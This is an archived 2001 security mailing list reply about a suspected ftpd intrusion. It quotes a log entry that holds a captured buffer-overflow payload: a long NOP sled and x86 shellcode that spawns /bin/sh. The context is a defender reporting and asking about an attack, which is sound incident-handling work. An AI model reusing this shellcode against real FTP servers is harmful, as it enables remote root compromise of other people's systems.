Security Incidents mailing list archives
Re: Linux ftpd
From: Sam Mingolelli <sam () jake8us org>
Date: Sat, 9 Jun 2001 12:23:56 -0400
This looks like a buffer overflow attack to me. I would make sure that you have the latest patches etc. applied to ftpd. You can browse thru the CERT dbs to see if any info has been posted regarding this. http://search.cert.org/query.html?rq=0&col=allcert&ht=0&qp=&qs=&qc=&pw=100%25&ws=1&la=&qm=0&st=1&nh=25&lk=1&rf=2&oq=&rq=0&si=1&qt=ftpd * mrcbis () tin it <mrcbis () tin it> [010609 12:12]:
I have a linux-box running slackware 7.1 with kernel 2.2.18 acting as office-server; we have an internet-connection in dial-up to an ISP near us. Today I was looking into log-files, I found, in /var/log/messages the following message: Jun 3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM 202.239.131.55 [2 02.239.131.55], <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90<90><90><90><90><90><90><90><90><90><90><90><90>1<C0>1<DB>1<C9><B0>F<CD><80>1<C 0>1 <DB>C<89><D9>A<B0>?<CD><80><EB>k^1<C0>1<C9><8D>^^A<88>F^Df<B9><FF>^A<B0>'<C D> <80>1<C0><8D>^^A<B0>=<CD><80>1<C0>1<DB><8D>^^H<89>C^B1<C9><FE><C9>1<C0><8 D>^^H <B0>^L<CD><80><FE><C9>u<F3>1<C0><88>F^I<8D>^^H<B0>=<CD><80><FE>^N<B0>0<FE<C8><88>F^D1<C0><88>F^G<89>v^H<89>F^L<89><F3><8D>N^H<8D>V^L<B0>^K<CD><80>1<C0>1 <DB> <B0>^A<CD><80><E8><90><FF><FF><FF>0bin0sh1..11 repeated twice within few minutes. I think it was an intrusion attempt. My linux-box is connected to the internet with dynamic-ip-address. Can someone help me ? Best regards Marco Bisio
-- \|/ @-@ ------------ooO---(_)--Ooo---------------- | E-Mail: | (H): slmingol () bubs f2s com | (W): sam.mingo () bigfoot com | | web: http://bubs.dnsq.org/~sam/
Current thread:
- Linux ftpd mrcbis (Jun 09)
- Re: Linux ftpd Sam Mingolelli (Jun 09)
- Re: Linux ftpd Przemyslaw Frasunek (Jun 09)
- Re: Linux ftpd centipede (Jun 09)
- Re: Linux ftpd Sam Mingolelli (Jun 09)